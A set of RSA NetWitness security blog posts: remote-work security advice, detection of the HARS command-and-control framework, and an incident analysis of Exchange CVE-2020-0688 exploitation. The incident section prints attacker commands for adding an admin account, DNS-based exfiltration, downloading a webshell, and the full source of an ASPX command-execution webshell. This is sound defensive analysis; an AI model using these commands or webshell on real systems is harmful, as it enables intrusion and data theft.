All Places > Products > RSA NetWitness Platform > Blog

1       Introduction

Events around the globe have suddenly forced many workers to stay at home. For a significant portion of these workers, that also means working remotely, either for the first time or more often than their normal telecommuting schedule. As a result, many organizations may be forced to implement new remote technologies or significantly expand their current capacity for remote users. This added capability can present a significant security risk if not implemented correctly. Furthermore, malicious actors never pass up the opportunity to capitalize on current affairs. The RSA Incident Response Team has years of experience responding to Targeted Attacks and Advanced Threat Actors while assisting our clients with improving their overall security posture. The members of our team are either working with our customers on-site or supporting them from home. Our team has frequently assisted clients remotely, providing us with extensive experience in operating a secure remote team. Given the evolving threat landscape, we are sharing some essential tips and suggestions on how organizations can improve their security posture, as well as how their remote workforce can stay secure by following some best practices.

2       Tips for Organizations (A Starting Point)

While there are many steps organizations can take to better protect themselves and their users, the RSA IR team is sharing some essential tips and suggestions that we consider a good starting point. However, this is by no means a complete list. Each organization should adjust the recommendations below according to its security posture, risk profile, and risk acceptance.

Many vendors are offering emergency capacity extensions or trials of their products in this time of unprecedented social change.  Check with your vendors to see if they have any such offers in place for technology that your organization does not already have implemented as it pertains to the recommendations listed below. For a strategic approach, take a look at the post from our colleagues on the Advanced Cyber Defense (ACD) team Work From Home - The Paradigm Shift in Cyber Defense.

2.1      What Organizations Can Do for Their Users

2.1.1    VPN

While it may be tempting and seem like an easy option to just make resources available online via services like RDP, this is generally not recommended. Threat actors love searching for vulnerable servers that are connected to the internet, regardless of the port used. Search engines like Shodan show an increase in the number of servers exposing RDP directly to the internet. Open RDP servers are regularly used to infect organizations with ransomware and other malware (Two weeks after Microsoft warned of Windows RDP worms, a million internet-facing boxes still vulnerable • The Register). RSA strongly discourages organizations from exposing RDP services directly to the internet.

Organizations should utilize VPN (or VPN alternative) technologies for employee remote access. RSA IR has the following tips regarding VPN usage.

  • Ensure licensing counts can support the increased number of remote workers.
  • Ensure that the VPN devices can handle the increased number of simultaneous connections and throughput.
  • For strong security, RSA recommends that the VPN be Always-On if possible. An Always-On VPN requires the system to be connected to the VPN whenever an authorized client is connected to the internet. If bandwidth, simultaneous connection count, or bring-your-own-device (BYOD) is of concern, this suggestion can be re-prioritized.
  • All traffic should be tunneled over the VPN (No Split Tunneling), thus enabling the same network visibility and controls as if users were in office. If bandwidth availability or bring-your-own-device (BYOD) is of concern to the organization, this recommendation can be re-prioritized.
  • Investigate VPN alternatives for certain users. Alternative remote access solutions also exist, such as Virtual Desktop Infrastructure (VDI), Cloud Infrastructure, Software as a Service (SaaS), and others.

2.1.2    Multi Factor Authentication (Also Known as Two Factor Authentication) For All Remote Access

All remote access (including VPN, VDI, Cloud, Office365, SaaS, etc.) should be required to utilize Multi Factor Authentication. Multi Factor Authentication, which is an evolution of Two Factor Authentication (2FA), enhances security by requiring that a user present multiple pieces of information for authentication. Credentials typically fall into one of three categories: something you know (like a password or PIN), something you have (like a smart card or token), or something you are (like your fingerprint). Credentials must come from two different categories in order to be classified as multi-factor. As mentioned, check with your vendors to see if they are offering any assistance with surge capacity or new solutions.
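To make the "something you have" factor concrete: many MFA products implement a time-based one-time password (TOTP, RFC 6238), where the token value is derived from a shared secret and the current 30-second time step. The sketch below is a generic illustration of the algorithm, not any particular vendor's implementation:

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32, timestamp=None, step=30, digits=6):
    """Minimal RFC 6238 TOTP: HMAC-SHA1 over the time-step counter."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int((timestamp if timestamp is not None else time.time()) // step)
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    # Dynamic truncation (RFC 4226): offset taken from the low nibble of the last byte
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

# Base32 form of the RFC 6238 SHA-1 test secret "12345678901234567890"
print(totp("GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ", timestamp=59))  # → 287082
```

Both the client token and the server compute the same value independently, so only the initial secret provisioning needs to be protected.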

2.1.3    User Education

RSA generally recommends that all staff using computer resources within a company complete annual security training. However, during this time when more users are working remotely, RSA recommends that organizations hold a special organization-wide user education session on password safety, phishing attacks, IT security policies, as well as covering how to report issues to the IT and Security Teams. If you’re looking for a place to start, see our other blog post for tips for users that are working from home (RSA IR - Recommendations for Users Working from Home).

2.2      What Organizations Can Do for Themselves

2.2.1    Updates and Patching

RSA consistently finds out-of-date and out-of-support operating systems and software running in client environments. Older software often has public vulnerabilities and exploits that are freely available online, and is targeted by commodity malware as well as targeted attackers. RSA strongly recommends that any core software be aggressively updated on a regular basis, especially if a vulnerability for a particular application is publicly announced. Exploiting vulnerable software is one of the easiest ways for an attacker to find their way into the enterprise. At a minimum, organizations should look to:

  • Update and Patch all external facing systems, servers and applications (including web applications or frameworks).
  • Update and Patch all Critical Systems internal or external.

2.2.2    Web Application Firewall

If not already deployed, RSA recommends implementing a Web Application Firewall (WAF) to better protect Internet facing web applications. A WAF solution can provide a reduction in the attack surface of web applications and in some cases, of the operating system itself. It is important to note that simply installing a WAF solution will not immediately secure all the web applications as all WAF solutions, regardless of vendor, need to be tuned for the specific applications and environments they are being used to protect.

If a WAF is already deployed, RSA recommends that organizations verify that it is in front of not just the business-critical web applications, but also all other external web-facing assets.

2.2.3    Leverage Freely Available Threat Intelligence Feeds

As notices have been released about increased attacker activity related to recent attacks and fraud, many threat intelligence vendors are offering free intelligence on current threats and scams. Check with these vendors to see which are offering related intelligence feeds at no cost, as well as additional tools for analysts.

2.2.4    Endpoint Detection and Response (EDR)

Endpoint Detection and Response (EDR) is especially important to organizations that, for various reasons, are unable to enable an Always-On VPN. 

If your organization already has an Endpoint Detection and Response (EDR) solution, ensure that it is deployed to all remote users.  Since endpoints may not be sending all their traffic internally to allow for network visibility, EDR tools can help gain visibility of endpoints operating outside the internal network environment. Organizations need to ensure that data collected by the EDR tool can be transmitted to the central EDR server either continuously or while connected to the VPN. Organizations must also ensure that their licensing limits, as well as server capacity, support a potential increase in the number of endpoints.  Speak to your security vendors to see if they provide surge or Business Continuity increases during this time.

If your organization does not currently have an EDR tool, then consider deploying one. EDR solutions now offer more than just detection and blacklisting of malware; they also have built-in forensic capabilities such as acquiring remote system files, memory images, behavior analysis, and false-positive management via whitelisting. This means that organizations can detect, respond to, and block malicious activity much more quickly, without the need to create a full host forensic image for investigation. Additionally, once a Behavior of Compromise (BOC) is identified, the EDR solution should be able to detect where else in the enterprise that indicator has been observed. Speak to your trusted security vendors and see if they are offering any on a trial basis.

2.2.5    Remote Collaboration

If your organization does not already have a policy for remote collaboration tools (such as screen share), consider adopting one for remote users. At the very least, RSA suggests having a recommendation for users so that they do not seek out their own solutions.  Some examples include Zoom, WebEx, GoToMeeting, Microsoft Teams, as well as others.

3      Conclusion

In these uncertain times, we hope that this advice will help organizations and users stay connected and stay secure. Watch out for more posts and advice from across the RSA organization, and let us know what you're doing in the comments below.

I have recently been posting a number of blogs regarding the usage of the RSA NetWitness Platform to detect attackers within your environment. As the list of blogs grows, it is becoming increasingly difficult to navigate through them easily. To combat this, this blog post will contain references to all other blog posts in the Profiling Attackers Series, and will be updated when new posts are made.


Special thanks to Rui Ataide for his support and guidance for these posts.

I recently reviewed HTTP Asynchronous Reverse Shell (HARS) for The C2 Matrix, which should be posted soon! They also have a Google Docs spreadsheet here: C2Matrix - Google Sheets. I've been following them for a while and have tried to map as many of the frameworks as possible from a defensive perspective. This blog post will therefore cover just that: how to use RSA NetWitness to detect HARS.


The Attack

After editing the configuration files, we can compile the executable to run on the victim endpoint. After executing the binary we get the default error message, which is configurable, but we left it with default settings:


The error message is a ruse and the connection is still made back to the C2 server where we see the successful connection from our victim endpoint:


It drops us by default into a prompt where we can begin to execute our commands, such as whoami, quser, etc.:


Detection Using NetWitness Network

By default HARS uses SSL, so to see the underlying HTTP traffic, we used a MITM proxy to intercept the communication; it is highly advisable to introduce SSL interception into your own environment. Within this post, we will also cover the anomalies in the communication over SSL.



An interesting meta value generated for the HARS traffic is http invalid cookie - this meta value looks for HTTP cookies that do not follow RFC 6265:
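For a sense of what such a check involves, here is a rough sketch of RFC 6265's cookie-octet restrictions in Python. This is an illustrative approximation written for this post, not the actual NetWitness parser logic:

```python
# RFC 6265 cookie-octet: %x21 / %x23-2B / %x2D-3A / %x3C-5B / %x5D-7E
# (printable US-ASCII excluding control chars, whitespace, DQUOTE, comma,
# semicolon, and backslash)
_COOKIE_OCTETS = (
    {chr(0x21)}
    | {chr(c) for c in range(0x23, 0x2C)}
    | {chr(c) for c in range(0x2D, 0x3B)}
    | {chr(c) for c in range(0x3C, 0x5C)}
    | {chr(c) for c in range(0x5D, 0x7F)}
)

def cookie_header_valid(header: str) -> bool:
    """Rough approximation: every pair must look like name=value, with the
    value made only of RFC 6265 cookie-octets."""
    for pair in header.split("; "):
        if "=" not in pair:
            return False  # bare token, like HARS's lone Base64 blobs
        name, _, value = pair.partition("=")
        if not name or any(ch not in _COOKIE_OCTETS for ch in value):
            return False
    return True

print(cookie_header_valid("session=abc123; theme=dark"))  # → True
print(cookie_header_valid("QVNL"))                        # → False (no name=value pair)
```

A bare Base64 blob with no `name=value` structure, as HARS sends, fails this kind of check immediately.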


Drilling into the Events view for these sessions before reconstructing them, we can observe that there is a beacon-type pattern to the connections with some jitter, as well as a low variance in the payload of each request - this indicates a more mechanical type of check-in behaviour:
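The same regularity can be quantified offline. As a hedged sketch (the sessions below are synthetic, not NetWitness output), a low coefficient of variation in both the inter-arrival deltas and the payload sizes is a reasonable beaconing indicator:

```python
from statistics import mean, pstdev

def beacon_score(timestamps, payload_sizes):
    """Crude beaconing heuristic: low relative spread in both the
    inter-arrival deltas and the payload sizes suggests automated check-ins.
    Returns (delta_cv, size_cv); values near 0 mean highly regular."""
    deltas = [b - a for a, b in zip(timestamps, timestamps[1:])]
    delta_cv = pstdev(deltas) / mean(deltas)
    size_cv = pstdev(payload_sizes) / mean(payload_sizes)
    return delta_cv, size_cv

# Hypothetical sessions: roughly 60s apart with small jitter, near-constant payloads
ts = [0, 61, 119, 181, 240, 299]
sizes = [412, 415, 412, 413, 412, 414]
d_cv, s_cv = beacon_score(ts, sizes)
print(d_cv < 0.1 and s_cv < 0.1)  # → True
```

Human-driven browsing tends to produce much higher spread on both axes, which is what separates it from mechanical check-ins.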


Reconstructing the events and looking at the cookie for the requests, we can see what looks like Base64 data:



Using the built-in Base64 decoding, we can see that this decodes to HELLO. While this is not indicative of malicious activity, this is still a malformed cookie and a rather strange value:


From here, we can continue to go through the traffic and decode the values supplied within the cookie header. The next few cookies contain the text QVNL, which returns ASK when Base64 decoded:
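The same decoding can be reproduced outside the UI with a few lines of Python; the helper below also tolerates values sent without Base64 padding:

```python
import base64

def decode_cookie(value: str) -> str:
    """Decode a Base64 cookie value, restoring any missing '=' padding."""
    padded = value + "=" * (-len(value) % 4)
    return base64.b64decode(padded).decode("utf-8", errors="replace")

print(decode_cookie("SEVMTE8="))  # → HELLO
print(decode_cookie("QVNL"))      # → ASK
```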


Eventually we come across a cookie with a Base64 encoded version of what looks like the output from a whoami command:


As well as one that contains the output from a quser command. Both of these look rather suspicious, and this is information that normally shouldn't be sent to a remote host, especially in this manner as a cookie value:


Looking through the request prior to the one that returns the output of quser, and sifting through the payload, there is a Base64 encoded quser command within it:


This C2 framework disguises its commands within legitimate looking pages in an attempt to evade detection by analysts, but is easily detected with NetWitness using a single meta value, http invalid cookie.

NOTE: It is important to remember that many applications abuse the HTTP protocol and do not follow RFCs, so it is possible for legitimate traffic to have invalid cookies. It is down to the defender to determine whether the activity is malicious or not, but NetWitness points you to these anomalies and makes it easier to focus on traffic of interest.


This C2 is highly malleable, so the following application rule would only pick up on its default configuration; however, attackers tend to be lazy and leave many of the default settings for these tools in place. This allows us to easily create an application rule to detect this behaviour:

cookie = 'QVNL','SEVMTE8='


In order for the application rule to work, you would need to register the cookie HTTP header. This involves using the customHeaders() function within the HTTP_lua_options file as described on the community:


One of our previous posts also covered registering the cookie HTTP header into a meta key and can be found on the community:




As previously stated, HARS uses SSL to communicate by default. When HARS initially connects back to the C2 from the victim endpoint, it attempts to blend in with typical traffic to www[.]bing[.]com. The below screenshot shows the malicious traffic (on the left), and the legitimate traffic to Bing (on the right). Playing spot the difference, we can see a few anomalies as highlighted below:


This allows us to create logic to detect possible HARS usage with the following application rule:

service = 443 &&'' &&'microsoft corporation' && ssl.subject='microsoft corporation'


And we can also create an application rule to look for anomalous Bing certificates, this would, however, be lower fidelity in order to detect a broader range of suspicious cases to aid in threat hunting:

service = 443 && = '' && not('' &&'microsoft corporation','baltimore' && ssl.subject='')


Detection Using NetWitness Endpoint

HARS uses PowerShell to execute the commands on the victim endpoint, but does not use any form of obfuscation. Therefore, in NetWitness Endpoint, we can see multiple hits under the Behaviours of Compromise meta key for the reconnaissance commands executed: quser, whoami, and tasklist:


Drilling into those meta values, we can see an executable named hars.exe running out of a suspect directory and executing reconnaissance-type commands:


Pivoting on the filename hars.exe (filename.src = 'hars.exe') - which could really be any other name, but would still be launching your commands - we can see all the events from this suspect executable, such as the commands it executed under the Source Parameter meta key:


After every command executed, HARS appends the following: echo flag_end. We can use this to our advantage to create an application rule to detect its behaviour:

category = 'console event' && param.src ends 'echo flag_end'
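To prototype that rule offline against exported console events, the equivalent check is a simple suffix match. The event field names below are hypothetical export names chosen for illustration, not an official schema:

```python
def matches_hars_rule(event: dict) -> bool:
    """Mirror of the application rule:
    category = 'console event' && param.src ends 'echo flag_end'.
    Field names ('category', 'param_src') are hypothetical."""
    return (event.get("category") == "console event"
            and event.get("param_src", "").rstrip().endswith("echo flag_end"))

events = [
    {"category": "console event", "param_src": "whoami & echo flag_end"},
    {"category": "console event", "param_src": "ipconfig /all"},
    {"category": "network event", "param_src": "quser & echo flag_end"},
]
print([matches_hars_rule(e) for e in events])  # → [True, False, False]
```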


Another neat indicator comes under the Context meta key. Here we can see four interesting meta values associated with hars.exe - console.remote, network.ipv4, network.nonroutable, and network.outgoing - these meta values tell us that this executable is making an outbound network connection and running console commands:


Drilling into the Events view for the network meta values, we can see where the executable is connecting to:


And drilling into the console.remote meta value, we can see the commands that were executed:


So from a defender's perspective, it could be a good idea to use the filter context = 'console.remote' and look for suspicious executables:



Not all C2 frameworks use advanced methods of obfuscation or encryption; some rely on confusing analysts by mimicking legitimate web sites to blend in with normal traffic. It is important as a defender to spot these anomalies and fully analyse the traffic, even if at first glance it appears to be normal. And remember, the attacker would probably think none of this really matters, as the attack is over SSL and this data would not be visible to analysts - which is where having SSL interception is a great advantage; it really catches attackers out.


By now, you may have already started to work from home instead of your usual workplace, like many of your co-workers and peers. As the situation continues to evolve, there is a rapidly increasing trend for organisations to shift their employees from the office to working from home. In addition to the recommendations provided in the following RSA blogs: Cyber Resiliency Begins at Home, RSA IR - Best Practices for Organizations (A Starting Point), and RSA IR - Recommendations for Users Working from Home, in this post we will examine in further detail the challenges that cybersecurity professionals are contending with as organizations around the globe transition more employees from offices to work-from-home arrangements and conduct meetings through virtual means. This transformation in how we work and conduct our businesses will inevitably have an impact on our threat environment. In the subsequent paragraphs, we will discuss the paradigm shift in our threat landscape and what we should do to continue to stay effective in safeguarding our assets from emerging cyber threats.



There are two key problems that we see here, which we will break down in the following paragraphs:


Problem #1

The cyber defense architectures of many organizations today are designed on the assumption that most daily BAU (business-as-usual) activities are performed on-premise. With the sudden need to allow a large number of employees to work from home, many of these activities must now be performed remotely. Setting aside the challenges of provisioning or scaling the IT infrastructure needed to support these sudden changes, this also gives rise to a shift in the threat landscape, where existing cyber defense measures that have worked in the past may no longer be effective.


Problem #2

There is an increasing trend of attackers preying on human psychology by crafting new attacks around the latest trending news topics, or by specifically targeting work-from-home employees through the remote meeting applications they use, for example:

  • Phishing Emails and Malware Attachments disguised as legitimate meeting invites and installers from popular remote meeting applications.
  • Malicious mobile applications promising to be the most up-to-date outlet for tracking the latest breaking news and developments.
  • Domain names that are similar to popular remote meeting platforms.


Combining the two problems above with the tendency for humans to feel more comfortable in our home setting than in the office, there is an increased likelihood that some of us will let our guard down when it comes to spotting phishing emails, malicious attachments and applications, and malicious websites that come knocking at the least expected moment. All of this can lead to an exponential increase in the level of cybersecurity risk faced by your organization - and when there is a sudden surge in the number of cybersecurity breaches, does your organization have the capacity to handle them?



Here, we look at what you, as part of the Cybersecurity Team in your organization, can explore from the perspectives of People, Process and Technology to address the above-mentioned issues.



Virtual Cyber Awareness Briefings. With increasingly more employees working from home, you can no longer conduct the usual quarterly cyber awareness briefings in traditional classroom settings. Instead of halting these briefings, why not take them virtual in the form of webinars for all employees who are working remotely? There are many platforms that allow you to do so, such as WebEx, Zoom, Adobe Connect, etc. You can also record the sessions and make them available offline for employees who are unable to join the live sessions.


EDMs. Apart from virtual awareness briefings, you should also look to increase the frequency of Electronic Direct Mails (EDMs) to remind the employees on the necessary cyber hygiene that they should continue to practice even when working from home.


Reward-based Quizzes. Besides briefings and EDMs, you can also take one step further to implement regular reward-based quizzes related to different cyber hygiene topics, in order to encourage and engage your employees in an interactive manner.  


Phishing Tests. Lastly, to assess whether the above initiatives are effective, the best way is to test them by running a phishing campaign against your internal employees. This could include regular phishing tests to assess their alertness in spotting such threats. You should also send out such emails in batches and in a random manner across different departments and regions, so that employees are not able to “cheat” the test by sharing information with their peers about ongoing tests.

For the above initiatives, you could potentially include phishing topics that are related to the latest trending news or emails disguised as coming from legitimate remote meeting applications (e.g. meeting invites) in order to mimic the latest threats that the organization is facing.



There are a couple of key processes which would require review and revision, to ensure that they are relevant to the work-from-home model. For example: 


Access Control. With the increasing number of employees working from home, you need to review the existing access control related processes, such as the requirements for an employee to qualify for remote access. For example, your Access Control List (ACL) for remote access may previously have been role-based, but this may no longer apply if practically all employees across different roles require remote access. With this sudden growth in remote access employees, are the existing access control provisioning and review processes still practical and relevant? Of course, there are many other issues to consider in this area, which are too lengthy to discuss in this post.


Incident Reporting. With the work-from-home model, you need to ensure that all employees working remotely are familiar with the incident reporting mechanisms in the event of any suspicious activity. For example, they need to know the reporting hotline and email address they can reach on a 24/7 basis, as well as other automated reporting mechanisms, such as a tool to report phishing emails from within their Outlook application.


Cybersecurity Champions. Apart from the regular incident reporting mechanisms, you should also consider appointing representatives across different departments or teams as “Cybersecurity Champions” - regular employees (i.e. not part of the Cybersecurity Team) who are more proficient in the organization's relevant security processes. This initiative allows employees to reach out to someone they are familiar with if they are unsure about any suspicious activity, or if they would like a quick refresher on best practices in cyber hygiene.


Incident Response (IR). Are your existing IR processes robust enough and tailored to include the remote working model practiced by most of your employees right now? You should look to review your existing processes covering the following phases and ensure that they remain relevant to the latest Business and Operating models of your organization:

  • Triage
  • Investigation
  • Containment
  • Eradication
  • Remediation
  • After Action Review



Access Control. In terms of access control provisioning for remote working, you should consider the best approach to implementing multi-factor authentication in a manner that lets you scale the infrastructure up or down quickly and cost-effectively. The options could include the following, depending on your existing set-up, requirements and budget:

  • Hardware token
  • Software token
  • SMS/ Email OTP


For operations on critical servers that need to be performed remotely, there may be a need to differentiate them from the regular 2FA that is provisioned for normal remote access, by having a further step-up in the authentication process.


Monitoring and Detection. With the shift to the remote working model, there is a need to put more focus on the SIEM Use Cases related to VPN and remote access so that you can pick up such threats early. These are some examples of the Use Cases that may be relevant to the remote working model:

  • Detecting VPN access from suspicious locations
  • Simultaneous VPN Geo login from a single user
  • Suspicious remote logon hours from critical admin accounts
  • Remote admin session reconnected from a different workstation
  • Mass phishing attempts targeting your organization
  • and many more..
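As an illustration of how one of these use cases might be prototyped, the sketch below flags the "Simultaneous VPN Geo login" case: the same user logging in from two different countries within a window too short for plausible travel. The event schema (timestamp, user, country) is hypothetical, not a specific SIEM's format:

```python
from collections import defaultdict

def geo_login_alerts(events, window=3600):
    """Flag users with logins from two different countries within `window`
    seconds. `events` are (timestamp, user, country) tuples."""
    alerts = []
    by_user = defaultdict(list)
    for ts, user, country in sorted(events):
        for prev_ts, prev_country in by_user[user]:
            if country != prev_country and ts - prev_ts <= window:
                alerts.append((user, prev_country, country))
                break
        by_user[user].append((ts, country))
    return alerts

events = [
    (1000, "alice", "US"),
    (1500, "alice", "RO"),   # ~8 minutes later, different country
    (2000, "bob", "US"),
    (9000, "bob", "US"),
]
print(geo_login_alerts(events))  # → [('alice', 'US', 'RO')]
```

A production rule would enrich logins with GeoIP data first and tune the window; the core correlation logic stays this simple.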


Endpoint. There are many different layers of endpoint controls which become especially important for the work-from-home model, such as the following:

  • Hard Disk Encryption for all PCs, so that the corporate data remains protected even if they are misplaced
  • Mobile Device Management which allows IT Department to manage the corporate information stored in mobile devices and allow the corporate information to be securely removed remotely if they are misplaced.
  • Endpoint Detection and Response to detect advanced threats in your endpoint devices, which may not have been picked up by traditional Anti-Malware solutions.
  • Data Labelling Enforcement and Data Loss Prevention (DLP) – Enforce data labeling for all documents and emails created or modified, and implement DLP to detect or prevent unauthorized movement of sensitive data.
  • Application Whitelisting as a second layer of defense against unauthorized installation of malicious applications masqueraded as genuine ones into the corporate PC.  


Network and Servers. To ensure that you are not opening up the attack surface of your network and assets given the increased number of remote connections, you should consider the following:

  • VPN provisioning for all remote connections.
  • Network Access Control to disallow remote connections from PCs to the corporate network if the Anti-Virus definitions or patching status of the PCs are not up-to-date.
  • Jump Server. Consider placing a Jump Server in front of critical servers to serve as an added layer of defense. This is especially important if the servers are critical but need to be accessed remotely.


Email. For corporate email, you could implement a Phishing Email Reporting Tool with which your employees can easily report a phishing email to the Cybersecurity Team without having to manually write an email or call the reporting hotline. Also, you should implement a labelling mechanism to automatically mark all emails received from external domains as “External”, as this has proven effective in raising the alertness of employees when they receive any external email, which could potentially be a phishing email or contain malicious artefacts.


Threat Intel and Hunting. A common saying goes, “Know thyself and thy adversary to win a hundred battles” - this applies in the realm of Cyber Defense as well. Having timely intel that is relevant to your threat landscape helps you perform sense-making and correlation of threats in your environment more effectively, and allows you to put the necessary measures in place early to look out for such threats. You should also conduct regular proactive threat hunting sessions by trained specialists (i.e. Threat Hunters) to discover low-lying and advanced attacks that might otherwise not be picked up by your regular controls.



Given the need to transition quickly, securely and efficiently to a remote working model for your organization, you will need to make the relevant changes to your existing Cyber Defense Architecture (in the areas of People, Process and Technology) within a short amount of time, to ensure that the level of cybersecurity risk to which your organization could potentially be exposed remains within an acceptable level. As such, it may be worthwhile to consider engaging external professionals for tasks that can be performed remotely, for example:

  • Perform a gap analysis on your existing processes (e.g. Incident Response and Reporting Processes, Access Provisioning Processes) through documents review and remote workshops that are focused on the remote working model and provide practical recommendations on what you can quickly implement to close the gaps.
  • Develop Use Cases that are tailored to the remote working model to ensure that the detection remains effective against the latest threat landscape.
  • Subscribe to a temporary Managed Security Service to outsource your Level 1 monitoring to an external party if you anticipate a surge in the number of alerts in the SOC during a particular period, so that you can free up the time of your internal SOC team to focus on investigation and incident response.
  • Subscribe to an IR Retainer service to implement a surge resourcing model, ensuring that you have sufficiently trained expert resources when needed most, to assist the internal IR Team in times of complex incidents which may require highly complex work such as malware analysis and digital forensics.
  • Conduct threat hunting sessions to discover any low-lying threats which may have been present for some time in your environment.



To conclude, there is no one-size-fits-all solution, but we hope that the above provides you with some useful insights in planning your Cyber Defense Architecture.



In this blog I describe a recent intrusion that started with the exploit of CVE-2020-0688. Microsoft released a patch for this vulnerability on 11 February 2020. In order for this exploit to work, an authenticated account is needed to make requests against the Exchange Control Panel (ECP). Some organizations may still not have patched this vulnerability for various reasons, such as prolonged change request procedures. One false sense of "comfort" in delaying this patch could be the fact that an authenticated account is needed to execute the exploit. However, harvesting a set of credentials from an organization is typically fairly easy, either via a credential harvesting email or via a simple dictionary attack against the Exchange server. The technical aspects of this exploit have been widely described on various sites. So, in this blog I will briefly describe the exploit artifacts, and then jump into the actual activity that followed the exploit, including an interesting webshell that utilizes pipes for command execution. I will then describe how to decrypt the communication over this webshell. Finally, I will highlight some of the detection mechanisms that are native to the NetWitness Platform that will alert your organization to such activity.


Exchange Exploit - CVE-2020-0688


The first sign of the exploit started on 26 February 2020. The attacker leveraged the credentials of an account they had already compromised to authenticate to OWA. An attacker could acquire such accounts either by guessing passwords due to a poor password policy, or by preceding the exploit with a credential harvesting attack. Once at least one set of credentials has been acquired, the attacker can start to issue commands via the exploit against ECP. The IIS logs contain these commands, and they can be easily decoded via a two-step process: URL Decode -> Base64 Decode.
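The same two-step decode can also be scripted instead of using CyberChef. A minimal Python sketch (the sample payload below is a benign, hypothetical stand-in, not data from the actual logs):

```python
import base64
import urllib.parse

def decode_ecp_exploit_param(logged_value: str) -> bytes:
    """Reverse the two-step encoding seen in the IIS logs:
    URL-decode first, then Base64-decode."""
    return base64.b64decode(urllib.parse.unquote(logged_value))

# Hypothetical, benign sample payload for illustration only.
sample = urllib.parse.quote(base64.b64encode(b"cmd /c echo flogon").decode())
print(decode_ecp_exploit_param(sample))  # b'cmd /c echo flogon'
```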


IIS log entry of exploit code


The following CyberChef recipe, URL_Decode() followed by From_Base64('A-Za-z0-9+/=', true), helps us decode the highlighted exploit code:


The highlighted encoded data above decodes to the following, where we see the attacker attempting to echo the string 'flogon' into a file named flogon2.js in one of the public-facing Exchange folders:


Decoded exploit command


The attacker performed two more exploit success checks by launching an ftp command to anonymously log in to an IP address, followed by a ping request to a Burp Collaborator domain:


Exploit-success checks


The attacker returned on 29 February 2020 to attempt to establish persistence on the Exchange servers (multiple servers were load balanced). The exploit commands once again started with pings to Burp Collaborator domains and FTP connection attempts to an IP address to ensure that the server was still exploitable. These were followed up by commands to write simple strings into files in the Exchange directories, as shown below:


Exploit success checks


The attacker also attempted to create a local user account named “public” with the password “Asp-=14789” via the exploit, and attempted to add this account to the local administrators group. Both actions failed.


Attacker commands
cmd /c net user public Asp-=14789 /add
cmd /c net localgroup administrators public /add


The attacker issued several ping requests to subdomains of a site that can be freely used to test data exfiltration over DNS. In these commands, the DNS resolution itself is what sends the data to the attacker. Again, the attacker appears to have been checking whether the exploit commands were successful, and these DNS requests would have confirmed it.


Here is what the attacker would have seen if the requests were successful:


DNSBin RSA test


Here are some of the generic ping commands the attacker tried (destination domains redacted):
ping -n 1 **REDACTED**
ping -n 1 **REDACTED**
ping -n 1 **REDACTED**


After confirming that the DNS requests were being made, the attacker started concatenating the output of PowerShell commands to these DNS requests in order to see the results of the commands. It is worth mentioning that at this point the attacker was still executing commands via the exploit, and while the commands did execute, the attacker had no way to see their results. Hence, initially the attacker wrote some output to files as shown above (such as flogon2.txt), or, in this case, sent the output of the commands via DNS lookups. So, for example, the attacker tried commands such as:


Concatenating Powershell command results to DNS queries


powershell Resolve-DnsName((test-netconnection -port 443 -informationlevel quiet).toString()+'')

powershell Resolve-DnsName((test-path 'c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth').toString()+$env:computername+'')


These types of requests would have confirmed that the server was allowed to connect outbound to the Internet, tested the existence of the specified path, and sent the hostname to the attacker.
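Conceptually, this exfiltration technique just prepends the command output to the attacker's domain as the leftmost DNS label, so that resolving the name leaks the data to the attacker's nameserver. A simplified Python sketch (the domain and the sanitisation rules are illustrative assumptions, not the attacker's actual tooling):

```python
def exfil_hostname(command_output: str, attacker_domain: str) -> str:
    """Build a DNS name whose leftmost label carries the command output.
    DNS labels allow at most 63 characters from a limited charset,
    so strip everything else and truncate; real tooling would chunk
    longer output across multiple queries."""
    label = "".join(c for c in command_output if c.isalnum() or c == "-")[:63]
    return label + "." + attacker_domain

# e.g. the output of test-path plus the hostname, as in the attacker's commands
print(exfil_hostname("True" + "EXCH01", "attacker.example"))
```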


Exploit command output exfiled via DNS




Once the attacker confirmed that the server(s) could reach the Internet and verified the Exchange path, he/she issued a command via the exploit to download a webshell hosted on Pastebin into this directory, under a file named OutlookDN.aspx (I am redacting the full Pastebin link to prevent other actors from hijacking such webshells on other potential victims, since the webshell is password protected):


Webshell Upload via Exploit
powershell (New-Object System.Net.WebClient).DownloadFile('**REDACTED**','C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\OutlookDN.aspx')


The webshell code downloaded from pastebin is shown below:


Content of OutlookDN.aspx webshell
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Reflection" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Web" %>
<%@ Import Namespace="System.Web.UI" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>
<form id="form1" runat="server">
<asp:TextBox id="cmd" runat="server" Text="whoami" />
<asp:Button id="btn" onclick="exec" runat="server" Text="execute" />
</form>
<script runat="server">
protected void exec(object sender, EventArgs e)
{
    Process p = new Process();
    p.StartInfo.FileName = "cmd";
    p.StartInfo.Arguments = "/c " + cmd.Text;
    p.StartInfo.UseShellExecute = false;
    p.StartInfo.RedirectStandardOutput = true;
    p.StartInfo.RedirectStandardError = true;
    p.Start();
    Response.Write("<pre>\r\n" + p.StandardOutput.ReadToEnd() + "\r\n</pre>");
}
protected void Page_Load(object sender, EventArgs e)
{
    if (Request.Params["pw"] != "*******REDACTED********") Response.End();
}
</script>


At this point the exploit was no longer necessary since this webshell was now directly accessible and the results of the commands were displayed back to the attacker. The attacker proceeded to execute commands via this webshell and upload other webshells from this point forward. One of the other uploaded webshells is shown below:


Webshell 2
